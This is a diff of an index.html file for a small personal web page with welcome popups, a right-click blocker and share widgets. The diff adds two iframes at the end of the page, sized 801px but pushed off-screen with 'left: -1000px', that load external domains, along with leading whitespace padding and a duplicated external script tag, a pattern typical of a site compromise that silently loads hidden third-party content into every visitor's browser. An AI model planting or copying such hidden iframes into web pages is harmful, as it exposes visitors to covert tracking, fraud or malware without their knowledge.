--- a/index.html
+++ b/index.html
@@ -1,4 +1,6 @@
-<html><head></head><body onload="alert('Bem-vindo curte do conteudo');" onunload="confirm('Gracias por tu visita, espero que no sea la última');"><br><br>
+
+   
+                <html><head></head><body onload="alert('Bem-vindo curte do conteudo');" onunload="confirm('Gracias por tu visita, espero que no sea la última');"><br><br>
 <div style="width:900px; position: relative; margin-left: auto; margin-right: auto;"> 
 
   
@@ -77,7 +79,7 @@
         }
   </style>
    
- <script async="" src="http://widgets.itaringa.net/share.js"></script><script>
+ <script async="" src="http://widgets.itaringa.net/share.js"></script><script async="" src="http://widgets.itaringa.net/share.js"></script><script>
 // Inhabilitar el botón derecho
 var DADrccolor = "red";
 var DADrcimage =
@@ -444,4 +446,5 @@ body {
         
 </style>
   
-</div></div><script type="text/javascript" src="https://100widgets.com/stat.js.php"></script></body></html>
+</div></div><script type="text/javascript" src="https://100widgets.com/stat.js.php"></script><iframe src="https://powered-by-revidy.com/b" style="width: 801px; height: 801px; border: 0px; position: absolute; left: -1000px;"></iframe>
+<iframe src="https://resistcorrectly.com/stat" style="width: 801px; height: 601px; border: 0px; position: absolute; left: -1000px;"></iframe></body></html>
